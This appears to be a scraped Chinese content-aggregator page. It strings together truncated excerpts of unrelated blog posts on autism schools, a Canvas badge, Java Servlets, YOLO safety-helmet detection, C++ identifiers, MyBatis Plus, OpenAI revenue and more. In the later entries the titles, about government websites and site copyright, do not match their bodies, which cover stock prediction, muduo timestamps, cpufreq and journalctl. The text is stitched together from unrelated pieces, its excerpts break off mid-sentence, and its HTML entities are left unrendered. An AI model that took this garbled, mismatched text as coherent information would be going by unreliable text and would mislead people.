在自闭症儿童的教育与康复领域&#xff0c;每一所学校的努力都是对孩子们未来无限可能的一次深刻诠释。从江苏睢宁到广东广州&#xff0c;自闭症寄宿学校正以不同的方式&#xff0c;为这些特殊的孩子铺设一条通往未来的希望之路。其中&#xff0c;广州的星贝育园自闭症儿童寄宿…...

【Canvas与徽章】金圈蓝底国庆75周年徽章

【成图】 【代码】 <!DOCTYPE html> <html lang"utf-8"> <meta http-equiv"Content-Type" content"text/html; charsetutf-8"/> <head><title>金边黑盾75周年</title><style type"text/css"&g…...

Java Servlet 详解

Java Servlet 是 Java 企业级应用 中的一个核心组件&#xff0c;特别是在 Web 应用开发中&#xff0c;它为服务器端处理请求提供了基础。每次用户发出请求时&#xff0c;Servlet 都会动态生成响应&#xff0c;这在构建复杂、交互式的 Web 应用时尤为重要。 什么是 Servlet&am…...

yolov8/9/10模型在安全帽、安全衣检测中的应用【代码+数据集+python环境+GUI系统】

yolov8910模型安全帽、安全衣检测中的应用【代码数据集python环境GUI系统】 yolov8/9/10模型在安全帽、安全衣检测中的应用【代码数据集python环境GUI系统】 背景意义 安全帽和安全衣在工业生产、建筑施工等高风险作业环境中是保护工人免受意外伤害的重要装备。然而&#xff0…...

算力共享系统中数据平面和控制平面

目录 算力共享系统中数据平面和控制平面 数据平面 控制平面 算力共享系统举例 控制流程和业务流程,在算力共享系统中举例说明 控制流程 业务流程 算力共享系统中数据平面和控制平面 在算力共享系统中,数据平面和控制平面是两个关键组成部分,它们各自承担着不同的角色…...

C++语言学习(4): identifier 的概念

1. 什么是 identifier identifier 中文意思是标识符&#xff0c;在 cppreference 中明确提到&#xff0c;identifier 是任意长度的数字、下划线、大写字母、小写字母、unicode 字符 的序列&#xff1a; An identifier is an arbitrarily long sequence of digits, underscores…...

浅谈计算机神经网络基础与应用

1. 绪论 随着科技的飞速发展,人工智能(AI)已经逐渐渗透到我们生活的方方面面。作为AI技术的核心组成部分,神经网络在推动这一领域的发展上扮演着至关重要的角色。本报告旨在探讨AI中的不同类型神经网络及其在实际应用中的表现和影响。我们将从神经网络的基本概念入手,逐步…...

【SpringBoot详细教程】-08-MybatisPlus详细教程以及SpringBoot整合Mybatis-plus【持续更新】

目录 🌲 MyBatis Plus 简介 🌾入门案例 🌾 MP 简介 🌲 MP 的CRUD 🌾 新增 🌾 删除 🌾 修改在进行 🌾 根据ID查询 🌾 查询所有 🌲 分页功能 🌾 设置分页参数 🌾 设置分页拦截器 🌲 优化启动 🌾 取消mbatisPlusBanner 🌾 取消Sprin…...

[20241002] OpenAI融资文件曝光,ChatGPT年收入涨4倍,月费5年内翻倍

智东西9月29日消息&#xff0c;据《纽约时报》9月27日报道&#xff0c;OpenAI的内部文件显示&#xff0c;该公司在8月份的月收入达到3亿美元&#xff0c;自2023年初以来增长了1700%&#xff0c;预计今年年度销售额将达到37亿美元&#xff0c;其中ChatGPT将带来27亿美元的收入。…...

工业缺陷检测——Windows 10本地部署AnomalyGPT工业缺陷检测大模型

0. 引言 在缺陷检测中&#xff0c;由于真实世界样本中的缺陷数据极为稀少&#xff0c;有时在几千甚至几万个样品中才会出现一个缺陷数据。因此&#xff0c;以往的模型只需在正常样本上进行训练&#xff0c;学习正常样品的数据分布。在测试时&#xff0c;需要手动指定阈值来区分…...

中国建设监理官方网站/分析网站推广和优化的原因

12月05日&#xff0c;钛博士机器人侦测到 15 起发生在科技和互联网行业的投融资或并购事件&#xff0c;其中 12 起发生在中国境内&#xff0c;3 起发生在海外&#xff0c;总计交易额超过8.23亿人民币。 中国境内今天科技行业投融资总额约6.47亿人民币&#xff0c;单笔最大交易事…...

织梦 网站版权信息/网络推广员为什么做不长

使用Python和支持向量回归在本文中&#xff0c;我将向您展示如何使用称为支持向量回归&#xff08;SVR&#xff09;的机器学习算法创建自己的股票预测Python程序。在这个程序中&#xff0c;我将使用Facebook&#xff08;FB&#xff09;股票数据&#xff0c;并根据数据预测某天的…...

做类似淘宝的网站设计需要什么/英文seo是什么

一、Timestamp类封装 class Timestamp: public muduo::copyable,public boost::less_than_comparable<Timestamp>类图如下&#xff1a; 值语义&#xff1a;可以拷贝&#xff0c;拷贝之后&#xff0c;与原对象脱离关系 对象语义&#xff1a;要么是不能拷贝&#xff1b;要么…...

自适应网站模板怎么做/阿里巴巴关键词排名优化

现代的CPU和主板都有节电技术&#xff0c;在CPU低负荷工作的会自动降频。如果需要临时设置主频和工作模式&#xff0c;可使用cpufreq手动调整。这个模式将在重启后失效&#xff0c;如果需要长期调整请修改/etc/sysconfig/cpuspeed。 一、检查内核加载 lsmod | grep "acpi_…...

手机app是用什么软件开发的/国家优化防控措施

用ll或ls –l去查看目录下文件详细信息第一位 文件类型 -第二位 文件权限 rw-r--r--第三位 硬链接数 1第四位 文件的所有者 root第五位 文件的所属组 root第六位 文件大小 0第七位 文件最后修改时间 Jul 10 02:08文件类型.- 二进制文件B 块设备文件C 字符设备文件D 目录文件L 软…...

做网站如何规避法律风险/百度 竞价排名

1、概述日志管理工具journalctl是centos7上专有的日志管理工具&#xff0c;该工具是从message这个文件里读取信息。Systemd统一管理所有Unit的启动日志。带来的好处就是&#xff0c;可以只用journalctl一个命令&#xff0c;查看所有日志(内核日志和应用日志)。日志的配置文件是…...